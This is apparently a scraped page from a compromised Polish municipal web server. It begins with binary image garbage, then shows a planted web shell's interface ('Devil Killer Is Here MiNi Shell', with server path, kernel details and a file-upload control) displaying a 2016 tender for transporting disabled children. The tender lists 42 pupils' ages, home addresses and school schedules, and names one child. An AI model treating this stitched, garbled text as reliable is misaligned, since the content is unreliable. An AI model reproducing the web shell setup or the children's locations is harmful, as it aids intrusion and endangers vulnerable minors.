JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20161208/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20161208/362235-N-2016.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://bip.konstancinjeziorna.pl' target='_blank'>http://bip.konstancinjeziorna.pl</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 362235 - 2016
              z dnia 2016-12-08 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Konstancin-Jeziorna: Świadczenie usług transportowych zakresie kompleksowego dowozu dzieci i młodzieży niepełnosprawnej do specjalnych przedszkoli, szkół i ośrodków szkolno-wychowawczych w roku 2017<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Usługi
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Gmina Konstancin-Jeziorna, Urząd Miasta i Gminy Konstancin-Jeziorna, krajowy numer identyfikacyjny
              1327104500000, ul.
              ul. Warszawska 
              32,
              05520  
              Konstancin-Jeziorna, woj.
              mazowieckie, państwo
              Polska, tel.
              +48 22 7564810, +48 22 2011975, e-mail
              zamowienia@konstancinjeziorna.pl, faks
              +48 22 7564885, +48 222011975.
              <br />
              Adres strony internetowej (URL): www.konstancinjeziorna.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  tak
                <br />bip.konstancinjeziorna.pl</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />bip.konstancinjeziorna.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />Gmina Konstancin-Jeziorna <br />
                Adres:
                <br />ul. Warszawska 32, 05-520 Konstancin-Jeziorna</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Świadczenie usług transportowych zakresie kompleksowego dowozu dzieci i młodzieży niepełnosprawnej do specjalnych przedszkoli, szkół i ośrodków szkolno-wychowawczych w roku 2017<br /><b>Numer referencyjny: </b>ZP.271.56.2016<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                usługi
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Nie
                </div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>Przedmiotem zamówienia publicznego jest świadczenie usług transportowych w zakresie kompleksowego dowozu dzieci i młodzieży niepełnosprawnej  do specjalnych przedszkoli, szkół  i ośrodków  szkolno-wychowawczych oraz  z powrotem  do domu (niezwłocznie po skończonych zajęciach szkolnych) wraz z zapewnieniem im opieki w czasie dowożenia  we wszystkie dni nauki szkolnej, zgodnie z kalendarzem roku szkolnego 2016/2017 i 2017/2018 oraz na wszystkie imprezy organizowane przez placówki w obrębie Miasta Stołecznego Warszawy w okresie od dnia 02 stycznia 2017 do dnia 31 grudnia 2017 r.

1)	uczennica  lat 15
Z miejsca zamieszkania  Konstancin-Jeziorna, ul. Brzozowa 2D m 10 do Zespołu Szkół  Specjalnych  w Łbiskach, ul. B. Chrobrego 83  i z powrotem do domu.
Dowóz na zajęcia  na godz. 8:00
Zakończenie zajęć o godz. 16:00

2) 	uczennica lat 10 
           Z miejsca zamieszkania Bielawa ul. Wspólna 65 do Specjalnego Ośrodka  Szkolno     
           Wychowawczego w Łbiskach, ul. B. Chrobrego 80  i  z powrotem do domu.
  		Dowóz na zajęcia  na godz. 8:00
   	Zakończenie zajęć o godz. 17:00

3)          uczeń lat 8 
            Z miejsca zamieszkania Bielawa ul. Wspólna 65 do Specjalnego Ośrodka Szkolno- 
            Wychowawczego w Łbiskach, ul. B. Chrobrego 80  i  z powrotem do domu.
  		Dowóz na zajęcia  na godz. 8:00
   	Zakończenie zajęć o godz. 17:00

4)          uczeń lat 6
            Z miejsca zamieszkania Bielawa ul. Wspólna 65 do Niepublicznego Przedszkola   
            Integracyjnego  w Łbiskach, ul. B. Chrobrego 80  i  z powrotem do domu.
  		Dowóz na zajęcia  na godz. 8:00
   	Zakończenie zajęć o godz. 17:00

5)          uczeń lat 7
            Z miejsca zamieszkania Bielawa ul. Wspólna 65 do Niepublicznego Przedszkola   
            Integracyjnego  w Łbiskach, ul. B. Chrobrego 80  i  z powrotem do domu.
  		Dowóz na zajęcia  na godz. 8:00
   	Zakończenie zajęć o godz. 17:00

6)          uczeń lat 7
            Z miejsca zamieszkania Bielawa ul. Wspólna 65 do Niepublicznego Przedszkola   
            Integracyjnego  w Łbiskach, ul. B. Chrobrego 80  i  z powrotem do domu.
  		Dowóz na zajęcia  na godz. 8:00
   	Zakończenie zajęć o godz. 17:00

7)        uczeń lat 4
            Z miejsca zamieszkania Bielawa ul. Wspólna 65 do Niepublicznego Przedszkola   
            Integracyjnego  w Łbiskach, ul. B. Chrobrego 80  i  z powrotem do domu.
  		Dowóz na zajęcia  na godz. 8:00
   	Zakończenie zajęć o godz. 17:00

8) 	uczeń  lat 12  
Z miejsca zamieszkania Konstancin-Jeziorna ul. M. Jaworskiego 21D m 3 do Zespołu Szkół  Specjalnych w Łbiskach, ul. Chrobrego 83 i z powrotem do domu.
       	Dowóz na zajęcia na godz. 8:00 
       	Zakończenie zajęć o godz. 15:00

9) 	uczeń  lat 14 
Z miejsca zamieszkania  Konstancin-Jeziorna, ul. M. Jaworskiego 21C m 11 do Zespołu Szkół Specjalnych w Łbiskach, ul. Chrobrego 83   i z powrotem do domu.
  		Dowóz na zajęcia  na godz. 8:00
   		Zakończenie zajęć  o godz. 15:00

10)	uczennica   lat 19
Z  miejsca zamieszkania  Konstancin-Jeziorna, ul. M. Jaworskiego 22 m 6 do Zespołu Szkół Specjalnych w Łbiskach  ul. Chrobrego  83 i z powrotem do domu.
  		Dowóz na zajęcia   godz. 8:00
   		Zakończenie zajęć  o godz. 16:00

11)	uczennica  lat 21
Z miejsca zamieszkania  Konstancin-Jeziorna, ul. Kraszewskiego 7B m 11  do Zespołu Szkół  Specjalnych w Łbiskach ul. Chrobrego  83 i z powrotem  do domu.
     		Dowóz na zajęcia na godz. 8:00
     		Zakończenie zajęć o godz.  15:00 

12) 	uczeń lat 21  
Z miejsca zamieszkania  ze wsi Opacz 84A do  Zespołu Szkół Specjalnych w Łbiskach, ul. Chrobrego 83 i z powrotem do domu.
     	Dowóz na zajęcia na godz.  8:00  
     	Zakończenie zajęć o godz.  15:00

13)	uczeń  lat 22
      		Z miejsca zamieszkania  Konstancin-Jeziorna, ul. Wilanowska 114 m 33  do Zespołu 
                        Szkół Specjalnych w Łbiskach, ul. Chrobrego 83 (internat)  i z powrotem do domu.
     	Dowóz do szkoły w niedzielę o godz. 17:00
     	Powrót  do domu w piątek  o godz. 16:00

14)	uczeń lat 12
     Z miejsca zamieszkania Konstancin-Jeziorna ul. Wilanowska 9 m 3 do Zespołu Szkół Specjalnych w   Łbiskach, ul. Chrobrego 83  i z powrotem do domu.
    	Dowóz na zajęcia  na godz. 8:00
    	Zakończenie zajęć o godz. 15:00

15)       uczeń lat 15
     Z  miejsca zamieszkania Konstancin-Jeziorna ul. Brzozowa 2C m 2  do Zespołu Szkół Specjalnych w   Łbiskach, ul. Chrobrego 83 (internat)  i z powrotem do domu.
     Dowóz na zajęcia  w niedzielę godz. 17:00 
     Powrót piątek  godz. 16:00

16)       uczennica lat 20
     Z miejsca zamieszkania Konstancin-Jeziorna ul. Brzozowa 2C m 2 do Zespołu Szkół Specjalnych w   Łbiskach, ul. Chrobrego 83 ( internat)  i z powrotem do domu.
     Dowóz na zajęcia  w niedzielę godz. 17:00 
     Powrót piątek  godz. 16:00


17)	uczennica lat 17 
Z miejsca zamieszkania  Obory 20 m 8 gm. Konstancin-Jeziorna do Zespołu Szkół  Specjalnych w Łbiskach ul. Chrobrego 83 i z powrotem do domu.
       	Dowóz na zajęcia na godz.8:00 
       	Zakończenie zajęć  o godz. 15:00

18) 	uczennica lat 14
     Z miejsca zamieszkania Konstancin-Jeziorna ul. Piłsudskiego 6 do Zespołu Szkół Specjalnych w   Łbiskach, ul. Chrobrego 83  i z powrotem do domu.
   	Dowóz na zajęcia  na godz. 8:00
    	Zakończenie zajęć o godz. 16:00

19) 	uczennica lat 11
   	Z miejsca zamieszkania  Konstancin-Jeziorna, ul. Jaworskiego 26 m 8 do Zespołu Szkół Specjalnych w   Łbiskach, ul. Chrobrego 83  i z powrotem do domu.
   	Dowóz na zajęcia na godz. 8:00
   	Zakończenie zajęć o godz. 15:00 

20)	uczennica lat 8
   	Z miejsca zamieszkania  Konstancin-Jeziorna, ul. Jaworskiego 26 m 8 do Zespołu Szkół Specjalnych w  Łbiskach, ul. Chrobrego 83  i z powrotem do domu.
   	Dowóz na zajęcia na godz. 8:00
   	Zakończenie zajęć o godz. 15:00 

21) 	uczeń  lat 22 
 	Z miejsca zamieszkania DPS Konstancin-Jeziorna ul. Potulickich 1 do Zespołu Szkół Specjalnych w  Łbiskach, ul. Chrobrego 83  i z powrotem do domu.
  	Dowóz na zajęcia  na godz. 8:00
    	Zakończenie zajęć o godz. 15:00
Wymagany samochód przystosowany do przewozu osób niepełnosprawnych   ruchowo

22)	 uczennica lat 24
      Z miejsca zamieszkania DPS Konstancin-Jeziorna ul. Potulickich 1 do Zespołu Szkół Specjalnych w  Łbiskach, ul. Chrobrego 83  i z powrotem do domu.
    	Dowóz na zajęcia na godz. 8:00
    	Zakończenie zajęć o godz. 15:00
Wymagany samochód przystosowany do przewozu osób niepełnosprawnych   ruchowo
Dowóz do końca roku szkolnego 2016/2017

23) 	 uczeń lat 23
    	Z miejsca zamieszkania DPS Konstancin-Jeziorna ul. Potulickich 1 do Zespołu Szkół Specjalnych w   Łbiskach, ul. Chrobrego 83  i z powrotem do domu.
   	Dowóz na zajęcia  na godz. 8:00
   	Zakończenie zajęć o godz. 15:00

24) 	 uczeń lat 23
   	Z miejsca zamieszkania DPS Konstancin-Jeziorna ul. Potulickich 1 do Zespołu Placówek Szkolno-Wychowawczo-Rewalidacyjnych  Nr 1 w Warszawie, ul. Bełska 5  i z powrotem do domu.
            Dowóz na  zajęcia poniedziałek  na godz. 8:00
    	Powrót  do domu piątek o godz. 15:00

25) 	uczeń  lat 24
Z miejsca zamieszkania Konstancin-Jeziorna ul. Kwiatowa 16, do Niepublicznego Ośrodka Rewalidacyjno-Wychowawczego dla Dzieci i Młodzieży Niewidomej i Słabowidzącej  TĘCZA w Warszawie ul. Leonarda 12 i z powrotem do domu.
   		Dowóz na zajęcia na godz. 8:00
  		Zakończenie zajęć ok. godz. 15:00
Okres dowozu do końca roku szkolnego 2016/2017

26)	uczennica lat 21
        	Z miejsca  zamieszkania Konstancin-Jeziorna ul. Sobieskiego10A m 43 do  
Gimnazjum  Niepublicznego  przy Fundacji Pomocy Ludziom Niepełnosprawnym w  Warszawie przy ul. Zgrupowania AK Kampinos 4 i z powrotem do domu. 
    	Dowóz na zajęcia  na godz.  8:30
     	Zakończenie zajęć o godz. 15:00
Wymagany samochód przystosowany do przewozu osób niepełnosprawnych   ruchowo.
                                                                                                                                                          
27) 	uczeń lat 14
   	Z miejsca zamieszkania Konstancin-Jeziorna, ul. Jaworskiego 21P m 30 do   
Specjalnego Ośrodka Szkolno-Wychowawczego w Piasecznie przy ul. Szpitalnej 12  i  z  powrotem do domu.
    	Dowóz na zajęcia na godz. 8:00
    	Zakończenie zajęć  o godz. 17:00
Wymagany samochód przystosowany do przewozu osób niepełnosprawnych   ruchowo.

28) 	uczeń lat 9
Z miejsca zamieszkania Gassy 4 do Zespołu Szkół Integracyjnych nr 5 
w Konstancinie-Jeziornie ul Szkolna 7 i z powrotem do domu.
Dowóz na zajęcia  na godz. 8:00
    	Zakończenie zajęć o godz. 15:00                     

29) 	 uczeń lat 10
   	Z miejsca zamieszkania  Konstancin-Jeziorna, ul. Brzozowa  2B m 7 do Zespołu    
   	Szkół Integracyjnych Nr 5 w Konstancinie-Jeziornie, ul. Szkolna 7 
   	Dowóz na zajęcia na godz.8:00
    	Zakończenie zajęć o godz. 15:00

30) 	uczennica  lat 10
   	Z miejsca zamieszkania  Konstancin-Jeziorna, ul. Brzozowa  2B m 4 do Zespołu    
   	Szkół Integracyjnych Nr 5 w Konstancinie-Jeziornie, ul. Szkolna 7 
   	Dowóz na zajęcia na godz.8:00
    	Zakończenie zajęć o godz. 16:00

31)	Mizerska Barbara  uczennica  lat 7
   	Z miejsca zamieszkania  Konstancin-Jeziorna, ul. Dolna 9C do Zespołu    
   	Szkół Integracyjnych Nr 5 w Konstancinie-Jeziornie, ul. Szkolna 7 
   	Dowóz na zajęcia na godz.8:00
    	Zakończenie zajęć o godz. 14:00

32) 	  uczeń lat 23
Z miejsca zamieszkania Parcela ul. Grzybowska 5  gm. Konstancin-Jeziorna, do Zespołu Szkół Specjalnych Nr 85 przy ul. Elektoralnej 12/14  w Warszawie i z powrotem do domu.
  		Dowóz na zajęcia na godz.  8:00
   		Zakończenie zajęć o godz. 16:00

33)       uczeń lat 12
Z miejsca zamieszkania Słomczyn, ul. Jabłoniowa 57  gm. Konstancin-Jeziorna, do Zespołu Szkół Specjalnych Nr 63 przy ul. Elektoralnej 12/14  w Warszawie i z powrotem do domu.
  		Dowóz na zajęcia na godz.  8:00
   		Zakończenie zajęć o godz. 16:00

34) 	  uczeń lat 12
Z miejsca zamieszkania Słomczyn ul. Jabłoniowa 57 gm. Konstancin-Jeziorna, do Zespołu Szkół Specjalnych Nr 63 przy ul. Elektoralnej 12/14  w Warszawie i z powrotem do domu.
  		Dowóz na zajęcia na godz.  8:00
   		Zakończenie zajęć o godz. 16:00

35) 	 uczennica lat 13
Z miejsca zamieszkania Konstancin-Jeziorna ul. Bielawska 36C m 39, do Zespołu Szkół Specjalnych Nr 63 przy ul. Elektoralnej 12/14  w Warszawie i z powrotem do domu.
  		Dowóz na zajęcia na godz.  8:00
   		Zakończenie zajęć o godz. 16:00

36)       uczeń lat 9
Z miejsca zamieszkania Konstancin-Jeziorna ul. Królewska 13 do Szkoły Podstawowej z Oddziałami Przedszkolnymi Nr 226 przy ul. Plac Trzech Krzyży 4/6  w Warszawie i z powrotem do domu.
  		Dowóz na zajęcia na godz.  8:00
   		Zakończenie zajęć o godz. 16:00

  37 )        uczeń lat 13
Z miejsca zamieszkania Obory  20 m 8 gm. Konstancin-Jeziorna  do  Zespołu Szkół Specjalnych Nr 99 przy ul. Różanej 22/24  w Warszawie i z powrotem do domu.
  		Dowóz na zajęcia na godz.  8:00
   		Zakończenie zajęć o godz. 16:00

38)   	uczeń lat 19
Z miejsca zamieszkania Konstancin-Jeziorna, ul. Zakopane 3A do Specjalnego Ośrodka Szkolno-Wychowawczego dla Dzieci Słabowidzących Nr 8 w Warszawie, ul. Koźmińska 7
Dowóz na zajęcia:
Poniedziałek 7:40 -17:00
Wtorek 7:40  15:30
Środa 8:30  17:00
Czwartek 7:40  17:00
Piątek 8:30  14:30

39)	 uczennica lat 8
   	Z miejsca zamieszkania  Obory 19 m 18, gmina Konstancin-Jeziorna, do Zespołu    
   	Szkół Integracyjnych Nr 5 w Konstancinie-Jeziornie, ul. Szkolna 7 
   	Dowóz na zajęcia na godz. 8:00
    	Zakończenie zajęć o godz. 15:00

40)       uczeń lat 8 
   	Z miejsca zamieszkania Konstancin-Jeziorna ul. Długa  43 m 5 do Specjalnego 
Ośrodka Szkolno-Wychowawczego w Piasecznie przy ul. Szpitalnej 12  i z  powrotem  do domu.
Dowóz na zajęcia w poniedziałki na godz. 7:30 (internat)	 
  	Powrót piątki o godz.17:00

41) 	 uczeń lat 16 
Z miejsca zamieszkania  Konstancin-Jeziorna ul. Akacjowa 3  do Zasadniczej Szkoły Zawodowej w Specjalnym Ośrodku Szkolno-Wychowawczym w Piasecznie przy ul. Szpitalnej 12  i z  powrotem do domu.
Dowóz na zajęcia  na godz. 8:00
Zakończenie zajęć godz. 15:00

 42)     uczeń 20 lat
Z miejsca zamieszkania  Konstancin-Jeziorna ul. Mirkowska 58 m 4 do Zespołu Szkół Specjalnych  nr 38 w Warszawie, ul. Namysłowska 10
Dowóz na zajęcia  godz. 8:00
Zakończenie zajęć 16:00


2.	Godziny dowozu i przywozu dzieci Wykonawca ustali z rodzicami w taki sposób, aby dzieci nie były narażone na zbyt długie oczekiwanie w placówkach na rozpoczęcie zajęć szkolnych.
3.	Zamawiający, zgodnie z przepisem art. 29 ust. 3a ustawy Pzp, określa następujące wymagania zatrudnienia przez Wykonawcę oraz podwykonawców na podstawie umów o pracę osób wykonujących wskazane przez Zamawiającego czynności w zakresie realizacji zamówienia: 
1)	Zamawiający wymaga, aby przez cały okres realizacji zamówienia osoby, wykonujące bezpośrednio prace przy realizacji przedmiotu zamówienia były zatrudnione przez Wykonawcę lub odpowiednio przez Podwykonawcę na podstawie umowy o pracę, jeżeli wykonywane przez nich czynności polegają na wykonywaniu pracy w rozumieniu przepisu art. 22 § 1 ustawy z dnia 26 czerwca 1974 r.  Kodeks pracy (Dz. U. z 2014 r. poz. 1502 z późn. zm).
2)	Każdorazowo na żądanie Zamawiającego, w terminie wskazanym przez Zamawiającego nie krótszym niż 3 dni, Wykonawca zobowiązuje się przedłożyć Zamawiającemu, aktualne oświadczenie, że osoby, o których mowa w  pkt. 1) są zatrudnione przez Wykonawcę na podstawie umowy o pracę, podpisane przez osobę/y upoważnioną przez do reprezentowania Wykonawcy lub osobę przez Wykonawcę umocowaną. Przedmiotowe oświadczenie Wykonawca składa pod rygorem odpowiedzialności za składanie fałszywych oświadczeń. Na zasadach określonych w niniejszym punkcie Wykonawca przedstawia Zamawiającemu oświadczenia dotyczące podwykonawców. 
3)	Nieprzedłożenie przez Wykonawcę oświadczenia, o którym mowa w pkt. 2) w terminie wskazanym przez Zamawiającego będzie uprawniało Zamawiającego do naliczenia kary umownej określonej we wzorze umowy. 
<br /><br /><b>II.5) Główny kod CPV: </b>60130000-8<br /><br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                tak
                <br />
                Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp:
                Zamawiający przewiduje udzielenie zamówień podobnych - świadczenie usług transportowych w zakresie kompleksowego dowozu dzieci i młodzieży niepełnosprawnej do specjalnych przedszkoli, szkół, ośrodków szkolno-wychowawczych wraz z opieką nad dziećmi w czasie dowozu. Wartość zamówień podobnych będzie wynosić 35.553,00 zł netto. <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data zakończenia: 31/12/2017<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
